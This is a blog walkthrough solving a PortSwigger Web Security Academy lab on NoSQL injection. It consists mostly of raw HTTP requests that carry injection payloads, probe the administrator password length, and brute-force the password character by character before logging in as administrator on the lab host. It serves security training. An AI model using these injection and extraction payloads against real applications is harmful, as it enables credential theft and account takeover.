Skip to content

chojnowski.it

Port Swigger Exploiting NoSQL injection to extract

Port Swigger Exploiting NoSQL injection to extract

Exploiting NoSQL injection to extract data¶

Solution¶

NoSQL payload¶

Get error:  "message": "There was an error getting user details"
---
Payload: wiener'
---
GET /user/lookup?user=wiener' HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

NoSQL payload¶

Get error:  "message": "Could not find user"
---
Payload: wiener' && '1'=='2
Payload: wiener' && '1'=='1
---
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'2 HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
---
GET /user/lookup?user=wiener'+%26%26+'1'%3d%3d'1 HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Check that user administrator is valid¶

GET /user/lookup?user=administrator HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Check password long for user administrator¶

Password long: 8 characters
Payload: administrator' && this.password.length < 9 || 'a'=='b
Payload: administrator' && this.password.length < 8 || 'a'=='b
---
GET /user/lookup?user=administrator'+%26%26+this.password.length+<+9+||+'a'%3d%3d'b HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
---
GET /user/lookup?user=administrator'+%26%26+this.password.length+<+8+||+'a'%3d%3d'b HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Bruteforce password¶

password: kocqgsel
---
Set up "Cluster bomb attack"
Payload position 1: "Numbers" --> 0-8
Payload position 2: "Simple list" --> a-z
GET /user/lookup?user=administrator'+%26%26+this.password[0]%3d%3d'a 
---
GET /user/lookup?user=administrator'+%26%26+this.password[7]%3d%3d'l HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=z7mbEvdumZ1li3qvoXXoMYb9jlMuuxW9
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=wiener
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers
Connection: keep-alive

L: administrator
P: kocqgsel
---
POST /login HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=L4N9kIM52PJD2QNBPtUpVP0ZLkPANdTq
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 78
Origin: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers

csrf=58DetBhKQz18dqF5Vy5Ykq3pbWdMvr0r&username=administrator&password=kocqgsel
---
GET /my-account?id=administrator HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=3Ecd9H4ckk2OeTrOMTBsqFPMMlXbEYcg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/login
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Priority: u=0, i
Te: trailers
---
GET /user/lookup?user=administrator HTTP/2
Host: 0a0900bc036a98ac80c87b8e00350000.web-security-academy.net
Cookie: session=3Ecd9H4ckk2OeTrOMTBsqFPMMlXbEYcg
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:128.0) Gecko/20100101 Firefox/128.0
Accept: */*
Accept-Language: pl,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://0a0900bc036a98ac80c87b8e00350000.web-security-academy.net/my-account?id=administrator
Sec-Fetch-Dest: empty
Sec-Fetch-Mode: cors
Sec-Fetch-Site: same-origin
Priority: u=4
Te: trailers

Solved¶